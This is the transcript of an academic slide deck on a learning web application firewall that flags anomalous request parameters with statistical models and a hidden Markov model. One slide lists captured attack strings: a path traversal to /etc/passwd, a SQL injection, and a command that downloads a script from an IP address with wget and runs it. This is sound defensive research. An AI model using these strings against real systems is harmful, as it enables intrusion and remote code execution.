1 / 34

Learning Web Application Firewall – Benefits and Caveats

Learning Web Application Firewall – Benefits and Caveats. Dariusz Pałka Pedagogical University of Cracow dpalka@up.krakow.pl Marek Zachara University of Science and Technology (AGH) Cracow mzachara@agh.edu.pl. Outline.

marlo
Download Presentation

Learning Web Application Firewall – Benefits and Caveats

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Learning Web Application Firewall – Benefitsand Caveats Dariusz PałkaPedagogicalUniversity of Cracow dpalka@up.krakow.plMarek Zachara University of Science and Technology (AGH) Cracow mzachara@agh.edu.pl

  2. Outline • Introduction – why we need extra securitymechanisms for Web Applications • Learning Web Appliaction Firewall • Implementation • Learning WAF architecture • Data modelsused • Results • Summary

  3. Introduction • 72% of interviewedcompanieshadtheirwebsites/applicationshackedduring the preceeding 24 months. Most successfulattackshappen on the applicationlayer (Barracuda Networks) • Web applicationvulnerabilitiesoutnumberbrowser/OS vulnerabilities by ratio 1:10 (Microsoft Security Intelligence Report) • „More than 13% of all reviewed sites can be completely compromised automatically.About 49% of web applications contain vulnerabilities of high risk level (Urgentand Critical) detected during automatic scanning. However, detailed manual andautomated assessment by a white box method allows to detect these high risklevel vulnerabilities with the probability reaching 80-96%”. (Web Application Security Consortium)

  4. Introduction Unfortunately, governmentalwebsites and applicationsare no exception.The accessdetailsareavailable for sale on the black market.

  5. (source: blog.imperva.com)

  6. Web Application Architecture

  7. Common Attack MethodsAgainst Web Applications • Scriptinjections (especially SQL Injections) • Parametertampering • Forcefulbrowsing • Cross-sitescripting

  8. Security Levels

  9. Rule-based Web Application Firewalls • Problems (disadvantages) • Difficulties in configuring a WAF • Duplication of protectionrules • Constantadjustment of WAF rules

  10. Learning Web Application Firewall Black Box WAF

  11. Learning Patterns • Triggered(supervised) learning (TL) • Benefits: • No need to consider the data retention period size. • No need to storeallhistorical data. • Resistant to attackstargetingits learning process. • Drawabacks • The learning processmust be completed • A WAF must be manualy re-trainedafterchanges in protectedappliaction

  12. Learning Patterns • Continuous (unsupervised) learning (CL) • A WAF willonlyacceptparametervaluesthatmatchrecentusers’ behaviorpatterns • The firewall may be susceptible to speciallyengineeredattacksthat target its learning process

  13. Implementation • WAF isimplemented as Apache Server module • The analysis of incoming POST and GET parameters • Data analysisisconducted on the basis of a multi model approach - similar to the one presented by Giovani Vigna (University of California) and Christopher Krugel (Technical UniversityVienna)

  14. WAF Architecture Server Client Req. processing CORE_IN SSL_IN Request Data Validator HTTP_IN Data Validator Data Collector Model Generator Data Decryptor / Encryptor Req. Data Store Data Models

  15. Length of ParameterValues Someattackattempts, such as cross-sitescripting, directorytraversal and bufferoverflow, containlongcharactersequences, whichmightsignificantlyexceede the number of characters in legitimaterequests, and thisfeatureallows for theireasydetection.

  16. Length of ParameterValues • Chebyshev'sinequality: where: E(x) – expectedvalue of xvar(x) – variance of x • If:(length of parametervalue)where: – currentlyobservedparametervaluelength • We obtain:

  17. Length of ParameterValues E(l)=14.97 var(l)= 6.25 E(l)=15.06 var(l)= 5.99 E(l)=17.71 var(l)= 124.66 E(l)=15.15 var(l)= 13.02

  18. Length of ParameterValues If and Attackscannot be detected

  19. Belonging to PredefinedClasses Examples of classes of parametervaluesdefined with the use of regularexpressions: • A wholenumberwith orwithout a sign (e.g. 123, +56, -78)^[+-]?(0)|([1-9]\d*)$ • A dotseparated real number(e.g 123, 12.3, .3)^([0-9]+\.[0-9]*)|([0-9]*\.[0-9]+)|([0-9]+)$ • A commaseparated real number^([0-9]+,[0-9]*)|([0-9]*,[0-9]+)|([0-9]+)$ • An email address(e.g. somebody@example.org)^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}$ • The US currency(e.g. $0.59, $1050, $2,596.99) ^\$(\d{1,3}(\,\d{3})*|(\d+))(\.\d{2})?$ • Http(s) URL (e.g http://example.org, https://example.org/test/abc)^https?\://[a-zA-Z0-9\-\.]+\.[a-zA-Z]{2,3}(/\S*)*$ • One word^[a-zA-Z]+$ • A simpletext^[a-zA-Z0-9.!?,;”’- \t\n]+$

  20. Belonging to PredefinedClassess • Learning • Ifallvalues from a learning set belong to k-th regularexpressionclass, thisclassisadded to set C (parameterconstrains set) • Testing • The observedvalueistestedifitbelongs to classes - the number of classes (from set C) to which the observedvaluebelongsis i

  21. The Character Distribution • For everycharacterin parametervalues (from a learning set) we calculateanexpectedvalue of relativefrequency and variance of relativefrequences • (relative characterfrequency in i-th parametervalue) = number of occurencescharacter in i-th parametervalue/ length of i-th parametervalue

  22. The Character Distribution

  23. The Character Distribution

  24. The Character Distribution • Testing • for everycharacter:

  25. ParameterStructuralInference • Structuralinferencemayhelpifsimplemodelsdescribedearlierare not sufficient • In thisapproach the structure of legitimateparametervaluesismodelled as a regularlanguage • We useHiddenMarkov Model to describethisregularlanguage

  26. Ergodic HMM

  27. Parameterstructuralinference • Definitions • O(k) = O(k)1O(k)2…O(k)N – k-th observationsequence • λ = (A,B,π) – HMM model • Learning - adjusting the model parametersλ to maximize • Baum-Welch algorithm (finds the local minima of the likelihoodfunction) • Generating k HMMs with a number of states from 2 to sqrt(N), where N is the number of characters in the longestobservationsequence • A, B and πmatricesarerandomlyinitialised • The HMM with max(

  28. ParameterStructuralInference • Testing • Oobs = O1O2…ON – observationsequence (from incomingrequests) • Calculate P(Oobs|) usingForward-BackwardProcedure ()

  29. AnomalyDetection • After definingparticularmodels, we candetermine the anomalyscore for anobservedparametervalue where: - probability of anobservedparametervalue for a given model m n – number of models

  30. Results • Dataset • 3 independent production Web Servers • 10 total web applications • 3853 parametersanalysed with a totalnumber of values 527070 • Attack queries • 73 queriescollected from our Web Servers • 12 queriesselected from „HTTP-delivered attacks against web servers” Database (http://www.i-pi.com/HTTP-attacks-JoCN-2006/)

  31. Results

  32. Types of AttacksFound by WAF • Examples of attackattemptsfound by our Learning WAF (in parametervalues): • ../../../../../../../../../../../../../../../../../../../../../../../etc/passwd(Directory Traversal) • phpinfo();(ParameterTampering) • ' or 1=1 –(SQL Injection) • //phpMyAdmin2/config/config.inc.php(ForcefulBrowsing) • /../../winnt/system32/logfiles/w3svc1/ex000121.log • cd /tmp;rm -rf font-nix;wget 67.58.79.162/font-nix;perl font-nix

  33. Summary • Benefits of a Learning WAF • Can be easilyextended with new Data Models to improvesecurity • Requiresminimalconfigurationefforts • Can be a supplement for exisitingsecuritysystems • Still TO DO… • Add data modelsthattakeintoconsiderationcorrelationsbetweenparameters in a request (not to treateachparameter as a single one) • Improvestructuralinference (B-W algorithm in a current form istime-consuming, whichmay be a problem in productionenviroments with high traffic) • Improvesupport for a requestcontext (e.g. try to detect and utilsesessionIDs)

  34. THANK YOU

More Related